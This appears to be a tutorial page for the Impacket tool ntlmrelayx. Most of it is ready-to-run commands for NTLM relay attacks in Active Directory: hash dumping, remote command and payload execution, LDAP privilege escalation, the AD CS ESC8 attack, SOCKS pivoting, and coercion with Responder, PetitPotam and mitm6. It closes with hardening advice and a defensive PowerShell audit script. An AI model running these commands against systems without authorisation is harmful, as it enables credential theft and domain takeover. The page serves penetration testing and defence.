ntlmrelayx
ntlmrelayx is a powerful tool from the Impacket framework that intercepts NTLM authentication and relays it to target services, enabling lateral movement and privilege escalation in Active Directory environments. It eliminates the need for hash cracking by directly using captured credentials against accessible services.
Installation
ntlmrelayx comes as part of the Impacket toolkit. Install via pip or from source:

```bash
# Install via pip (recommended)
pip install impacket

# Or clone from GitHub and install
git clone https://github.com/fortra/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install

# Verify installation
ntlmrelayx.py -h
```
Quick Start
Basic NTLM relay to an SMB target:

```bash
# Simple SMB relay (requires captured authentication); dumps SAM hashes by default
ntlmrelayx.py -t smb://TARGET_IP -smb2support

# With command execution
ntlmrelayx.py -t smb://TARGET_IP -smb2support -c "command here"

# Execute a file on the target instead of dumping hashes
ntlmrelayx.py -t smb://TARGET_IP -smb2support -e /tmp/shell.exe
```
Key concept: ntlmrelayx acts as a MITM proxy, capturing NTLM authentication attempts and relaying them to the target service.
Relay Targets
Specify which services to relay authentication to:

| Option | Description |
|---|---|
| `-t smb://TARGET` | Single SMB target |
| `-t ldap://DC` | LDAP relay (unencrypted) |
| `-t ldaps://DC` | LDAP relay (encrypted) |
| `-t mssql://TARGET` | MSSQL relay |
| `-t http://URL` | HTTP relay (AD CS, etc.) |
| `-t imap://TARGET` | IMAP relay |
| `-tf targets.txt` | File with multiple targets (one per line) |
| `-tl TARGET_LIST` | Multiple targets as a comma-separated list |
Multiple targets enable round-robin relay of captured credentials across several machines.
SMB Relay
Relay authentication to SMB and execute commands or dump hashes:

```bash
# Basic SMB relay with SMB2 support
ntlmrelayx.py -t smb://192.168.1.50 -smb2support

# Execute command on target
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -c "whoami"

# Another command example
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -c "net localgroup administrators"

# Dump SAM hashes (default action when no -c/-e/-i is given)
ntlmrelayx.py -t smb://192.168.1.50 -smb2support

# Execute exe from UNC path
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -e C:\\payload.exe

# Interactive shell mode
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -i

# SOCKS proxy for further pivoting
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -socks
```
SMB2 support (`-smb2support`) is required for modern Windows targets. Without it, only SMB1 (deprecated) targets can be relayed to.
LDAP Relay
Relay to LDAP for directory enumeration and modifications:

```bash
# Basic LDAP relay
ntlmrelayx.py -t ldap://DC_IP -smb2support

# Add computer account to domain
ntlmrelayx.py -t ldap://DC_IP -smb2support --add-computer

# Grant Resource-Based Constrained Delegation (RBCD)
ntlmrelayx.py -t ldap://DC_IP -smb2support --delegate-access

# Escalate privileges of an existing user (flag takes the username as argument)
ntlmrelayx.py -t ldap://DC_IP -smb2support --escalate-user USERNAME

# Full domain dump (users, groups, OUs)
ntlmrelayx.py -t ldap://DC_IP -smb2support --dump-domain

# Set shadow credentials (Windows 2016+)
ntlmrelayx.py -t ldap://DC_IP -smb2support --shadow-credentials

# LDAPS (encrypted LDAP)
ntlmrelayx.py -t ldaps://DC_IP -smb2support
```

LDAP relay is powerful for direct domain object modification, enabling rapid privilege escalation without pass-the-hash.
MSSQL Relay
Relay credentials to MSSQL servers for query execution and RCE:

```bash
# Basic MSSQL relay
ntlmrelayx.py -t mssql://MSSQL_IP -smb2support

# Execute query
ntlmrelayx.py -t mssql://MSSQL_IP -smb2support -c "SELECT @@version"

# Enable xp_cmdshell and execute OS command
ntlmrelayx.py -t mssql://MSSQL_IP -smb2support -c "EXEC xp_cmdshell 'whoami'"

# Dump database contents
ntlmrelayx.py -t mssql://MSSQL_IP -smb2support -c "SELECT name FROM sys.databases"
```
HTTP Relay
Relay to HTTP services, especially useful for AD CS web enrollment (ESC8 attack):

```bash
# HTTP relay for AD CS Certificate Services
ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template "User"

# Generic HTTP relay
ntlmrelayx.py -t http://webserver -smb2support

# Specify certificate template
ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template "Machine"

# Output certificate to file
ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template "User" -o /tmp/cert.pfx
```
HTTP relay against AD CS can lead to certificate-based privilege escalation (ESC8).
Multi-Target Relay
Relay captured credentials across multiple targets:

```bash
# Multiple targets in file (one per line)
echo "192.168.1.50" > targets.txt
echo "192.168.1.51" >> targets.txt
echo "192.168.1.52" >> targets.txt
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

# Comma-separated targets
ntlmrelayx.py -t smb://192.168.1.50,192.168.1.51,192.168.1.52 -smb2support

# Relay to different services (SMB + LDAP)
ntlmrelayx.py -t smb://192.168.1.50 -t ldap://192.168.1.10 -smb2support
```
Round-robin targeting distributes captured credentials across multiple machines, increasing impact.
SOCKS Proxy Mode
Use relayed connections as a SOCKS proxy for further exploitation:

```bash
# Start SOCKS proxy
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -socks

# Listen on custom port (default 1080)
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -socks -socksport 5555

# Use with proxychains
# Add to /etc/proxychains.conf:
# socks5 127.0.0.1 1080
proxychains secretsdump.py -no-pass TARGET_IP
proxychains psexec.py -no-pass DOMAIN/USER@TARGET_IP
proxychains mssqlclient.py -no-pass TARGET_IP
```
SOCKS mode enables chained attacks where relayed credentials provide access for further exploitation.
Capture vs Relay
Understanding the attack flow:

```bash
# Responder captures NTLM hashes (standalone)
responder -I eth0 -v

# ntlmrelayx actively relays captured auth (active MITM)
ntlmrelayx.py -t smb://target -smb2support

# Combining both for automatic relay:
# Terminal 1: Responder captures and forwards
responder -I eth0 -v
# Terminal 2: ntlmrelayx relays to target
ntlmrelayx.py -t smb://target -smb2support --no-http-server --no-smb-server

# Only relay HTTP/LDAP, let Responder handle LLMNR/MDNS
ntlmrelayx.py -t ldap://dc -smb2support
```
Direct relay (in-memory) bypasses hash cracking entirely. Captured hashes are never written to disk.
Triggering Authentication
Common techniques to force authentication toward ntlmrelayx:

```bash
# Responder - LLMNR/MDNS/DHCP poisoning
responder -I eth0 -v -w -d

# Coercer - Windows coercion (MS-FSRVP, MS-RPRN, etc.)
coercer -l attacker_ip -t target_ip

# PetitPotam - ADCS HTTP coercion
python3 petitpotam.py -u username -p password attacker_ip target_ip

# PrinterBug - force print server to authenticate
python3 printerbug.py domain/user:pass@target attacker_ip

# mitm6 - IPv6 DHCP poisoning
mitm6 -d domain.local

# WPAD attack (the WPAD host option is -wh, single dash)
ntlmrelayx.py -t http://target -smb2support -wh attacker_ip
```
Combine auth triggers with ntlmrelayx for complete exploitation chains.
IPv6 Attacks
Leverage IPv6 DHCP poisoning with mitm6:

```bash
# Terminal 1: mitm6 poisons DHCPv6
mitm6 -d domain.local

# Terminal 2: ntlmrelayx relays captured auth
ntlmrelayx.py -t ldap://dc.domain.local -smb2support --dump-domain

# Alternative: Relay to SMB
ntlmrelayx.py -t smb://server.domain.local -smb2support
```
IPv6 is often overlooked, making DHCPv6 spoofing effective even when IPv4 is hardened.
Advanced Options
Fine-tune ntlmrelayx behavior:

```bash
# Remove MIC (Message Integrity Check) for older Windows
ntlmrelayx.py -t smb://target -smb2support --remove-mic

# Disable SMB server (relay-only mode)
ntlmrelayx.py -t ldap://dc --no-smb-server --no-http-server

# Disable HTTP server
ntlmrelayx.py -t smb://target -smb2support --no-http-server

# Custom WPAD hostname
ntlmrelayx.py -t smb://target -smb2support -wh wpad.domain.local

# Specify relay port
ntlmrelayx.py -t smb://target -smb2support -rp 8080

# Output file (for certain modules)
ntlmrelayx.py -t ldap://dc -smb2support -o output.txt

# Dump LAPS password
ntlmrelayx.py -t ldap://dc -smb2support --dump-laps

# Domain authentication for relay
ntlmrelayx.py -t ldap://dc -smb2support -domain domain.local
```
Troubleshooting
Issue: “Connection refused” or “target unreachable”
- Verify network connectivity and firewall rules
- Check the target IP address and service port (445 for SMB, 389/636 for LDAP)
- Ensure SMB2 support is enabled with `-smb2support`

Issue: “NTLM auth failed” or “relay not triggered”
- Confirm authentication is being sent toward ntlmrelayx (use Responder or Coercer)
- Check that the relayed user has permissions on the target
- Verify the network position allows MITM (LLMNR poisoning with Responder)

Issue: Command execution fails
- Ensure the relayed account has admin or execute permissions
- Use `-i` for an interactive shell instead of `-c` for one-off commands
- Test connectivity manually first: `secretsdump.py -no-pass target_ip`

Issue: SOCKS proxy not working
- Verify ntlmrelayx is running with the `-socks` flag
- Check that the proxychains config points to the correct localhost:1080
- Ensure the relayed user has permissions for the intended operations

Issue: “Signature verification failed”
- The target may enforce SMB signing; try the `--remove-mic` flag
- Some exploits are incompatible with signed SMB; consider a different target
Best Practices
- Always obtain authorization before testing NTLM relay in any environment
- Use network segmentation: NTLM relay requires a MITM position; hardened networks mitigate this
- Monitor for exploitation: high-volume failed authentication attempts may indicate attacks
- Disable LLMNR/mDNS: set `HKLM\Software\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast = 0`
- Enable SMB signing: enforce SMB signing on all servers (Group Policy)
- Require EPA: enable Extended Protection for Authentication (EPA)
- Segment LDAP: restrict LDAP access via firewall and credentials
- Monitor outbound NTLM: alert on NTLM auth relayed to unexpected services
- Patch promptly: keep Windows and services updated to patch relay vectors
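One way to verify the host-side mitigations listed above, as an added PowerShell audit script that is not part of the original page or of Impacket: it reads the documented policy registry values for LLMNR and SMB signing, plus (on domain controllers) LDAP signing and LDAP channel binding, which is the EPA counterpart that blunts the `ldap://` and `ldaps://` relay targets above, and reports which are still at the weak default. The `-Enforce` switch is an assumed name I chose; it writes the hardened values, so run elevated and expect Group Policy to overwrite local edits on its next refresh.

```powershell
# Added example (not from the original page): audit NTLM-relay mitigations on a Windows host.
# Registry locations are the documented policy keys; -Enforce is this script's own switch.
[CmdletBinding()]
param([switch]$Enforce)

# Each entry: registry path, value name, hardened value, and which relay vector it blunts.
$checks = @(
    @{ Scope = 'LLMNR';      Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
       Name = 'EnableMulticast'; Want = 0
       Why  = 'Disable LLMNR so name-resolution poisoning has nothing to answer' },
    @{ Scope = 'SMB server'; Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
       Name = 'RequireSecuritySignature'; Want = 1
       Why  = 'Require SMB signing inbound (defeats smb:// relay to this host)' },
    @{ Scope = 'SMB client'; Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters'
       Name = 'RequireSecuritySignature'; Want = 1
       Why  = 'Require SMB signing outbound' },
    @{ Scope = 'LDAP (DC)';  Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
       Name = 'LDAPServerIntegrity'; Want = 2
       Why  = 'Require LDAP signing (defeats ldap:// relay); DC only' },
    @{ Scope = 'LDAPS (DC)'; Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
       Name = 'LdapEnforceChannelBinding'; Want = 2
       Why  = 'Always require LDAP channel binding (EPA; defeats ldaps:// relay); DC only' }
)

$results = foreach ($c in $checks) {
    # A missing key or value means the OS default applies, which is the weak setting.
    $cur = (Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue).($c.Name)
    $ok  = ($null -ne $cur) -and ($cur -eq $c.Want)
    if (-not $ok -and $Enforce) {
        if (-not (Test-Path $c.Path)) { New-Item -Path $c.Path -Force | Out-Null }
        Set-ItemProperty -Path $c.Path -Name $c.Name -Value $c.Want -Type DWord
        $cur = $c.Want; $ok = $true
    }
    [pscustomobject]@{
        Scope   = $c.Scope
        Setting = $c.Name
        Current = if ($null -eq $cur) { 'not set (default)' } else { $cur }
        Wanted  = $c.Want
        Status  = if ($ok) { 'OK' } else { 'WEAK' }
        Why     = $c.Why
    }
}
$results | Format-Table -AutoSize
```

Any row marked WEAK corresponds to a relay target type from the sections above that would still succeed against this host.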
Related Tools
| Tool | Purpose |
|---|---|
| Responder | LLMNR/mDNS/DHCP poisoning to capture NTLM |
| Coercer | Force Windows coercion (MS-FSRVP, MS-RPRN) |
| mitm6 | IPv6 DHCP poisoning for WPAD attacks |
| krbrelayx | Kerberos relay attacks (similar to NTLM relay) |
| Certipy | Active Directory Certificate Services enumeration/abuse |
| PetitPotam | ADCS HTTP coercion via MS-EFSRPC |
| proxychains | Route traffic through SOCKS proxy for pivoting |
| secretsdump | Dump credentials via NTLM relay or pass-the-hash |